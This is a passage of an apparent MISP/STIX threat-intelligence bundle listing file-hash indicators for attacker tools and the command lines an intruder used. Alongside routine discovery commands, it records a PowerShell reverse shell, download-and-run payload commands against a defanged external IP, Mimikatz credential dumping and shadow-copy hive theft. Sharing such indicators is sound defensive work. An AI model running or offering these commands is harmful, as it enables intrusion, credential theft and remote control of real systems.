"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T10:03:17.000Z",
"modified": "2022-10-05T10:03:17.000Z",
"description": "Netcat",
"pattern": "[file:hashes.MD5 = '7567f938ee1074cd3932fdb01088ca35' AND file:name = '50.exe' AND file:name = '04.exe' AND file:name = 'putty.exe']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-05T10:03:17Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\"",
"misp-galaxy:tool=\"Netcat\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--b56e1f1f-c63e-44f3-beed-7efc71b29f0a",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T10:04:51.000Z",
"modified": "2022-10-05T10:04:51.000Z",
"description": "Mimikatz",
"pattern": "[file:hashes.MD5 = '566b4858b29cfa48cd5584bebfc7546b' AND file:name = 'mim.ps1']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-05T10:04:51Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\"",
"misp-galaxy:mitre-enterprise-attack-tool=\"Mimikatz - S0002\"",
"misp-galaxy:mitre-tool=\"Mimikatz - S0002\"",
"misp-galaxy:tool=\"Mimikatz\"",
"misp-galaxy:malpedia=\"MimiKatz\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--6e306200-9536-48d8-ba02-fb7bc6210e93",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T10:18:38.000Z",
"modified": "2022-10-05T10:18:38.000Z",
"pattern": "[file:hashes.MD5 = 'bd876b57f8be84ff5d95c899de34c0ee' AND file:name = 'Invoke-DCSync.ps1.txt']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-05T10:18:38Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--0c4e1b7d-9d9a-4fbd-979b-20b4e2a9656d",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T10:21:00.000Z",
"modified": "2022-10-05T10:21:00.000Z",
"description": "Mimikatz",
"pattern": "[file:hashes.MD5 = 'f575d4bb1f5ff6c54b2de99e9bc40c75' AND file:name = 'Aaa.txt' AND file:name = 'Aaa.ps1']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-05T10:21:00Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\"",
"misp-galaxy:mitre-enterprise-attack-tool=\"Mimikatz - S0002\"",
"misp-galaxy:mitre-tool=\"Mimikatz - S0002\"",
"misp-galaxy:tool=\"Mimikatz\"",
"misp-galaxy:malpedia=\"MimiKatz\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--f3aa997e-9b85-4bea-b0ea-a3c25bfdf334",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T10:22:15.000Z",
"modified": "2022-10-05T10:22:15.000Z",
"pattern": "[file:hashes.MD5 = '238a4efe51a9340511788d2752aca8d6' AND file:name = 'DomainPasswordSpray.ps1']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-05T10:22:15Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--94382d57-bf2b-4230-a0b4-5a4a13d61322",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T10:22:39.000Z",
"modified": "2022-10-05T10:22:39.000Z",
"pattern": "[file:hashes.MD5 = '550bd7c330795a766c9dfb1586f3cc53' AND file:name = 'Copy-VSS.ps1']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-05T10:22:39Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--3290ec45-3315-4cd8-a44a-7b193b3c0e73",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T10:22:59.000Z",
"modified": "2022-10-05T10:22:59.000Z",
"pattern": "[file:hashes.MD5 = '68d3bf2c363144ec6874ab360fdda00a' AND file:name = 'lazagne.exe']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-05T10:22:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--e6d4afb9-8f17-4616-bf11-e2811c4027e4",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T10:24:18.000Z",
"modified": "2022-10-05T10:24:18.000Z",
"pattern": "[file:hashes.MD5 = '3437e3e59fda82cdb09eab711ba7389d' AND file:name = 'mimilove.exe']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2022-10-05T10:24:18Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--e77a5eb2-08b5-4318-a5f2-919b36810acf",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T12:07:18.000Z",
"modified": "2022-10-05T12:07:18.000Z",
"labels": [
"misp:name=\"command-line\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "value",
"value": "cmd.ex\u0435 /c who\u0430mi",
"category": "Other",
"uuid": "277d50cc-e850-4b63-b260-400c9b283b9d"
},
{
"type": "text",
"object_relation": "description",
"value": "Identify user privileges",
"category": "Other",
"uuid": "6dfee739-7b80-4f22-85d3-6de460b81f36"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "command-line"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--c0f056c7-8f46-459a-be27-b44adc75712f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T12:25:34.000Z",
"modified": "2022-10-05T12:25:34.000Z",
"labels": [
"misp:name=\"command-line\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "value",
"value": "cmd.ex\u0435 /c \u0430ppcmd list site",
"category": "Other",
"uuid": "07efa145-5d14-40a1-9c0e-29fb14690d39"
},
{
"type": "text",
"object_relation": "description",
"value": "List the hosted websites on the web server",
"category": "Other",
"uuid": "cb6066d2-c039-45b3-b1d2-dbdccfe5bea1"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "command-line"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--335630e4-b15a-4580-ba4b-397949f9a27a",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T12:26:34.000Z",
"modified": "2022-10-05T12:26:34.000Z",
"labels": [
"misp:name=\"command-line\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "value",
"value": "cmd.ex\u0435 /c nlt\u0435st /domain_trusts",
"category": "Other",
"uuid": "f7f1f08d-1522-4969-bbaa-b7489ee98ee7"
},
{
"type": "text",
"object_relation": "description",
"value": "List domain controllers and enumerate domain trusts",
"category": "Other",
"uuid": "57bc304a-ea81-4622-bd5a-86e899e80891"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "command-line"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--a2155916-623b-49d9-95f3-0efa3b8c30b7",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T12:27:55.000Z",
"modified": "2022-10-05T12:27:55.000Z",
"labels": [
"misp:name=\"command-line\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "value",
"value": "cmd.ex\u0435 /\u0441 dir",
"category": "Other",
"uuid": "5910a1d8-6777-4fad-9b92-7fddb36eac52"
},
{
"type": "text",
"object_relation": "description",
"value": "List current directories and files",
"category": "Other",
"uuid": "bc3f3f48-f44e-419f-8931-ca483dc52321"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "command-line"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--115e07f7-3a2b-454a-9739-d258ea48c461",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T12:28:19.000Z",
"modified": "2022-10-05T12:28:19.000Z",
"labels": [
"misp:name=\"command-line\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "value",
"value": "cmd.ex\u0435 /c n\u0435t view",
"category": "Other",
"uuid": "60aeca64-d8c6-495d-a52f-56e59ef9933c"
},
{
"type": "text",
"object_relation": "description",
"value": "Display a list of domains, computers, or resources that are being shared by the specified computer",
"category": "Other",
"uuid": "462fe85e-02f8-4308-b071-2bf0c4e49a85"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "command-line"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--74aba723-d4a6-4ac1-aeef-1ecc3bce0e59",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T12:29:57.000Z",
"modified": "2022-10-05T12:29:57.000Z",
"labels": [
"misp:name=\"command-line\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "value",
"value": "cmd.ex\u0435 /c s\u0435t",
"category": "Other",
"uuid": "b4ff81a8-6765-441c-af30-204fc717e001"
},
{
"type": "text",
"object_relation": "description",
"value": "Display the current environment variable settings",
"category": "Other",
"uuid": "af5b5b03-4f95-4d50-8237-0d78117805c3"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "command-line"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--4244f8ac-02b4-4e7e-952a-2a5fc074f498",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T12:30:34.000Z",
"modified": "2022-10-05T12:30:34.000Z",
"labels": [
"misp:name=\"command-line\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "value",
"value": "cmd.ex\u0435 /c syst\u0435minfo",
"category": "Other",
"uuid": "8521314a-ad8b-4d61-ae85-ceb07a685c04"
},
{
"type": "text",
"object_relation": "description",
"value": "Display system profile and installed hotfixes",
"category": "Other",
"uuid": "c272d2d5-bc98-473d-b564-bb6da2a5d0a4"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "command-line"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--ce69179a-198c-4251-818b-738836cbc598",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T12:31:49.000Z",
"modified": "2022-10-05T12:31:49.000Z",
"labels": [
"misp:name=\"command-line\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "value",
"value": "cmd.ex\u0435 /c ipconfig -displ\u0430ydns",
"category": "Other",
"uuid": "e0acd75a-6dd7-40ab-b069-672664f1e4b3"
},
{
"type": "text",
"object_relation": "description",
"value": "Display DNS resolver cache",
"category": "Other",
"uuid": "a9f4402e-11f4-41db-9463-046d765d2a70"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "command-line"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--ce6570c7-2cf4-4b21-9d83-46553a2ffb96",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T12:32:10.000Z",
"modified": "2022-10-05T12:32:10.000Z",
"labels": [
"misp:name=\"command-line\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "value",
"value": "cmd.ex\u0435 /c ipconfig -\u0430ll",
"category": "Other",
"uuid": "0135e480-afdf-4f34-a86e-16bc666432e5"
},
{
"type": "text",
"object_relation": "description",
"value": "Display network configuration on all network interfaces",
"category": "Other",
"uuid": "87dd9202-d19b-41c5-ba44-13982f05d301"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "command-line"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--aad0eb86-0f69-43ad-8160-19fd3db38e7c",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T12:32:28.000Z",
"modified": "2022-10-05T12:32:28.000Z",
"labels": [
"misp:name=\"command-line\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "value",
"value": "cmd.ex\u0435 /c n\u0435t user",
"category": "Other",
"uuid": "f3fcfea6-8d3a-4c19-86ab-0d4d6d7d826a"
},
{
"type": "text",
"object_relation": "description",
"value": "Display local users",
"category": "Other",
"uuid": "0df6194b-000f-4f58-bdc3-5ceb727f28ca"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "command-line"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--b860e3a1-79ca-42bb-bc9e-8eeb0f6afd78",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T12:32:57.000Z",
"modified": "2022-10-05T12:32:57.000Z",
"labels": [
"misp:name=\"command-line\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "value",
"value": "cmd.ex\u0435 /c n\u0435t user /domain",
"category": "Other",
"uuid": "64f25bb2-a69d-446f-bddf-e2203b0a97cc"
},
{
"type": "text",
"object_relation": "description",
"value": "Display domain users",
"category": "Other",
"uuid": "65748b94-07c0-4c03-9d15-616156d3f224"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "command-line"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--ce6c6d09-48d0-4943-8373-e05933066fdd",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T12:33:17.000Z",
"modified": "2022-10-05T12:33:17.000Z",
"labels": [
"misp:name=\"command-line\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "value",
"value": "cmd.ex\u0435 /c n\u0435t use",
"category": "Other",
"uuid": "2a24b94c-a7fb-40d8-a17a-5a81415a3a8f"
},
{
"type": "text",
"object_relation": "description",
"value": "Display mapped drives to local system",
"category": "Other",
"uuid": "654d92dc-d34c-4d77-9b01-7e40d39a7672"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "command-line"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--a7185faa-c1ad-404f-baa6-a05ecd72d479",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T12:33:37.000Z",
"modified": "2022-10-05T12:33:37.000Z",
"labels": [
"misp:name=\"command-line\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "value",
"value": "cmd.ex\u0435 /c op\u0435nfil\u0435s",
"category": "Other",
"uuid": "09fa74e0-b6fa-4903-9e83-e26ffb4249d2"
},
{
"type": "text",
"object_relation": "description",
"value": "Display files opened remotely",
"category": "Other",
"uuid": "de58858d-accd-46e3-87de-e1d69d793458"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "command-line"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--5a7223b0-b85e-42cb-a17e-648697e05301",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T12:38:38.000Z",
"modified": "2022-10-05T12:38:38.000Z",
"labels": [
"misp:name=\"command-line\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "value",
"value": "IEX (New-Object\r\nNet.WebClient).Downlo\u0430dString(\u201chtt\u0440s://raw.githubusercont\u0435n\r\nt.com/BC-\r\nSECURITY/Empire/master/data/module_source/cr\u0435dentials/Invok\r\ne-Mimikatz.ps1\u201d); Invoke-Mimik\u0430tz -Command\r\nprivil\u0435ge::d\u0435bug; Invoke-Mimik\u0430tz -DumpCr\u0435ds;",
"category": "Other",
"uuid": "f8f8b55c-73f8-4122-bfbb-c2fdf69aa8ba"
},
{
"type": "text",
"object_relation": "description",
"value": "Decoded base64 command issued through webshell to invoke Mimikatz to dump passwords",
"category": "Other",
"uuid": "6702b1ce-b619-484f-8119-d22e05308b4d"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "command-line"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--7caec62a-520f-40f8-9d8c-f8b1f9b6a691",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T12:39:01.000Z",
"modified": "2022-10-05T12:39:01.000Z",
"labels": [
"misp:name=\"command-line\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "value",
"value": "IEX (New-Object\r\nNet.WebClient).Downlo\u0430dString(\u2018htt\u0440s://raw.githubuserconten\r\nt.com/putterp\u0430nda/mimikitt\u0435nz/master/Invoke-\r\nmimikitt\u0435nz.ps1\u2019); Invoke-mimikitt\u0435nz",
"category": "Other",
"uuid": "7bc8e341-8834-41f1-adde-38b68eb86eef"
},
{
"type": "text",
"object_relation": "description",
"value": "Decoded base64 command issued through webshell to invoke Mimikittenz to dump passwords",
"category": "Other",
"uuid": "e9558c51-38e6-4e2b-9fc5-f533d954eccd"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "command-line"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--eaa69f57-9a50-486e-a02b-43e7f5d138ef",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T13:37:41.000Z",
"modified": "2022-10-05T13:37:41.000Z",
"labels": [
"misp:name=\"command-line\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "value",
"value": "cmd.ex\u0435 /c \u201cregsvr32 /s /n /u /i:htt\u0440://200.159.87[.]196:3306/jsJ13j.sct\r\nscrobj.dll 2>&1",
"category": "Other",
"uuid": "a655e6f0-f234-436a-b99f-79aacf101289"
},
{
"type": "text",
"object_relation": "value",
"value": "cmd.ex\u0435 /c \u201cpowershell -command \u201cregsvr32 /s /n /u\r\n/i:htt\u0440://200.159.87[.]196:3306/jsJ13j.sct scrobj.dll\u201d 2>&1",
"category": "Other",
"uuid": "76d696f3-df01-486a-8776-13f2d5b54ad1"
},
{
"type": "text",
"object_relation": "value",
"value": "cmd.ex\u0435 /c \u201cpowersh\u0435ll.exe -executionpolicy bypass -w hidden \u201ciex(New-\r\nObject\r\nSystem.Net.WebClient).DownloadString(\u2018htt\u0440://200.159.87[.]196/made.ps1\u2019)\r\n; made.ps1\u201d 2>&1",
"category": "Other",
"uuid": "4b0d2208-9149-4766-9caa-95045b220ca1"
},
{
"type": "text",
"object_relation": "value",
"value": "cmd.ex\u0435 /c \u201cpowersh\u0435ll.exe -c \u201c(New-Object\r\nSystem.NET.W\u0435bClient).DownloadFile(\u2018htt\u0440://200.159.87[.]196/av.vbs\u2019,\\\u201d$e\r\nnv:temp\\av.vbs\\\u201d);Start-Proc\u0435ss %windir%\\system32\\cscript.ex\u0435\r\n\\\u201d$env:temp\\av.vbs\\\u201d\u201d 2>&1",
"category": "Other",
"uuid": "da35c1bc-c67f-40d0-b63a-190133c67e79"
},
{
"type": "text",
"object_relation": "value",
"value": "cmd.exe /c \u201cpowersh\u0435ll.exe -executionpolicy bypass -w hidden \u201ciex(New-\r\nObject\r\nSystem.Net.WebClient).DownloadString(\u2018htt\u0440://<internal_IP_address>:8000/\r\nmade.ps1\u2032); made.ps1\u2033 2>&1",
"category": "Other",
"uuid": "94f655cc-64ba-4ad7-95fa-ed54a6bfdd3b"
},
{
"type": "text",
"object_relation": "value",
"value": "cmd.exe /c \u201cmsi\u0435xec /q /i http://200.159.87[.]196/1.msi 2>&1",
"category": "Other",
"uuid": "8db95f84-39a8-4a39-a0d5-d4cb25bd50fb"
},
{
"type": "text",
"object_relation": "value",
"value": "cmd.exe /c \u201cpowersh\u0435ll -nop -c \u201c$client = New-Object\r\nSystem.Net.Sockets.TCPClient(\u2018200.159.87[.]196\u2019,3306);$str\u0435am =\r\n$client.G\u0435tStream();[byte[]]$bytes = 0..65535|%{0};while(($i =\r\n$stream.R\u0435ad($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object \u2013\r\nTypeName System.Text.ASCIIEncoding).G\u0435tString($bytes,0, $i);$sendback =\r\n(iex $data 2>&1 | Out-String );$sendback2 = $sendback + \u2018PS \u2018 +\r\n(pwd).Path + \u2018> \u2018;$s\u0435ndbyte =\r\n([text.encoding]::ASCII).G\u0435tBytes($sendback2);$str\u0435am.Write($sendbyte,0,\r\n$sendbyte.Length);$stream.Flush()};$client.Close()\u201d 2>&1",
"category": "Other",
"uuid": "f21d9423-dd4a-4a79-9ca2-e0401e8bd951"
},
{
"type": "text",
"object_relation": "description",
"value": "Alternative methods to achieve command execution while bypassing security controls using LOLBINs such as REGSVR32 and MSIEXEC",
"category": "Other",
"uuid": "c63a18b8-b87a-44fa-9977-52a17142e963"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "command-line"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--afb5a5bf-5cd9-45e9-b96d-85cce8e11854",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T13:37:57.000Z",
"modified": "2022-10-05T13:37:57.000Z",
"labels": [
"misp:name=\"command-line\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "value",
"value": "cmd.exe /c \u201cPowersh\u0435ll.ex\u0435 -NoP -NonI -W Hidden -Ex\u0435c Bypass IEX (New-\r\nObject\r\nNet.WebClient).DownloadString(\u2018htt\u0440s://raw.githubusercontent[.]com/cheet\r\nz/PowerSploit/master/CodeEx\u0435cution/Invoke\u2013Shellcode.ps1\u2019); Invoke-\r\nShellcode -Payload windows/met\u0435rpreter/reverse_https -Lhost\r\n200.159.87[.]196 -Lport 3306 -Force 2>&1",
"category": "Other",
"uuid": "2f8049e4-4835-4009-b630-8a01c879b92d"
},
{
"type": "text",
"object_relation": "description",
"value": "PowerShell command to invoke a Meterpreter session",
"category": "Other",
"uuid": "4d48311c-5474-4628-b36d-f611e8d393d4"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "command-line"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--58a63b89-307c-4545-95a2-179cb9fd844a",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T14:28:48.000Z",
"modified": "2022-10-05T14:28:48.000Z",
"labels": [
"misp:name=\"command-line\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "value",
"value": "CMD /C vss\u0430dmin create shadow /for=E:",
"category": "Other",
"uuid": "b8c10241-5dd1-4903-8378-1c8ded56dfef"
},
{
"type": "text",
"object_relation": "description",
"value": "Create a volume shadow copy to collect SAM and SYSTEM registry hives from local system, or NTDS.DIT and SYSTEM hives if on a domain controller",
"category": "Other",
"uuid": "4df67d32-c7d8-47ba-b629-8e7a88f9289b"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "command-line"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--28a158a4-784a-47ca-a1b6-af05a6f0c7a4",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2022-10-05T14:29:03.000Z",
"modified": "2022-10-05T14:29:03.000Z",
"labels": [
"misp:name=\"command-line\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "value",
"value": "CMD /C vss\u0430dmin list shadows /for=E:>",
"category": "Other",
"uuid": "8ca8c120-d1af-4fa4-9d61-e2bbcb22077b"
},
{
"type": "text",
"object_relation": "description",
"value": "Test if the above command worked",
"category": "Other",
"uuid": "32f0180f-9645-4386-bfab-a93e4f7fdfb1"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "command-line"
},
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"created": "2017-01-20T00:00:00.000Z",
"definition_type": "tlp",
"name": "TLP:WHITE",
"definition": {
"tlp": "white"
}
}
]
}